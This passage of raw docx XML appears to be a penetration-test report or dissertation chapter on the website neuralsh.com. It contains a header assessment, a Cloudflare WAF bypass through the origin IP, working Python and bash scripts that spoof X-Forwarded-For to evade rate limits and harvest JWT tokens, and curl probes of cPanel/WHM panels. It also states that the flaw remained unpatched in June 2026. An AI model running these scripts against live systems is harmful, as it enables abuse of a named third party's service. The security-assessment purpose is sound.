        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.5.3 Security Header Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -sI https://neuralsh.com</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74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>`Strict-Transport-Security`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>max-age=15552000; includeSubDomains; preload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>`X-Frame-Options`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DENY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>`X-Content-Type-Options`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>nosniff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>`X-XSS-Protection`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1; mode=block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>`Referrer-Policy`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>strict-origin-when-cross-origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>`Content-Security-Policy`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>script-src 'self' **'unsafe-inline'**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Weak — N-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The unsafe-inline directive in the CSP weakens XSS protection by allowing execution of inline script blocks. If an XSS vulnerability exists, the CSP would not prevent exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.5.4 Cloudflare WAF Bypass Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A critical test was confirming that direct connections to the origin IP bypass the Cloudflare WAF entirely. This was demonstrated using Burp Suite by sending the same request through Cloudflare and then directly to the origin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>[FIGURE — Figure 4.14: Burp Suite — cloudflare vs direct origin confirming WAF bypass]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The WAF bypass was complete — any request sent to 103.16.62.217 directly is processed by the Apache web server without any Cloudflare filtering, logging, or protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.6 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploitation was conducted with the goal of confirming vulnerability severity through controlled proof-of-concept demonstrations. No data was modified or extracted, and all tests were bounded by the ethical constraints defined in Chapter 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.6.1 Rate Limit Bypass via X-Forwarded-For Header Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Finding: N-005 | CVSS: 9.1 (post-exploitation upgrade)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The hypothesis from the assessment phase was validated: the application tracks rate limits using the client-supplied X-Forwarded-For header rather than the real source IP. By providing a different random IP address as the X-Forwarded-For value on each request, the rate-limiting system treats each request as coming from a unique IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
        <w:br/>
        <w:t>import requests, random, time</w:t>
        <w:br/>
        <w:br/>
        <w:t>def random_ip():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return ".".join(str(random.randint(1, 254)) for _ in range(4))</w:t>
        <w:br/>
        <w:br/>
        <w:t>url = "https://neuralsh.com/web/v1/init/token"</w:t>
        <w:br/>
        <w:br/>
        <w:t>success_bypass = 0</w:t>
        <w:br/>
        <w:t>tokens = []</w:t>
        <w:br/>
        <w:t>for i in range(50):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    fake_ip = random_ip()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    headers = {"X-Forwarded-For": fake_ip, "X-Real-IP": fake_ip}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r = requests.get(url, headers=headers)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if r.status_code == 200:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        success_bypass += 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">        tokens.append(r.json().get("token"))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    time.sleep(0.05)</w:t>
        <w:br/>
        <w:br/>
        <w:t>print(f"Tokens collected: {success_bypass}/50 — Rate limits triggered: 0")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Results: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74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tokens Obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rate Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Without bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>18 / 50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Yes — request 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>With X-Forwarded-For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**50 / 50**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**None — 100% bypass**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>[FIGURE — Figure 4.15: Rate limit bypass — fifty/fifty tokens, zero rate-limit responses]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.6.2 JWT Token Farming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Finding: N-007 | Using the bypass from 4.6.1, 50 valid signed JWT tokens were collected in approximately three seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for i in $(seq 1 50); do</w:t>
        <w:br/>
        <w:t xml:space="preserve">    IP=$(python3 -c "import random; print(f'{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}')")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    curl -s -H "X-Forwarded-For: $IP" https://neuralsh.com/web/v1/init/token | jq -r '.token'</w:t>
        <w:br/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Each token was tested against /web/v1/category and /web/v1/text/search — both accepted guest tokens successfully, confirming the tokens granted real API access. A follow-up verification on 11 June 2026 confirmed the endpoint remains live and continues to return HTTP 200 with a valid signed JWT token, indicating that no remediation has been applied since the original finding was documented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="998595"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig416_jwt_404.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="998595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.16: JWT endpoint confirmed live (HTTP 200) as of eleven June 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.6.3 Admin Panel Access Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>All four critical admin panels were confirmed accessible without authentication:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># WHM — root server administration</w:t>
        <w:br/>
        <w:t>curl -sk https://103.16.62.217:2087/ | grep -i title</w:t>
        <w:br/>
        <w:t># &lt;title&gt;WHM Login&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># cPanel — hosting account control</w:t>
        <w:br/>
        <w:t>curl -sk https://103.16.62.217:2083/ | grep -i title</w:t>
        <w:br/>
        <w:t># &lt;title&gt;cPanel Login&lt;/title&gt;</w:t>
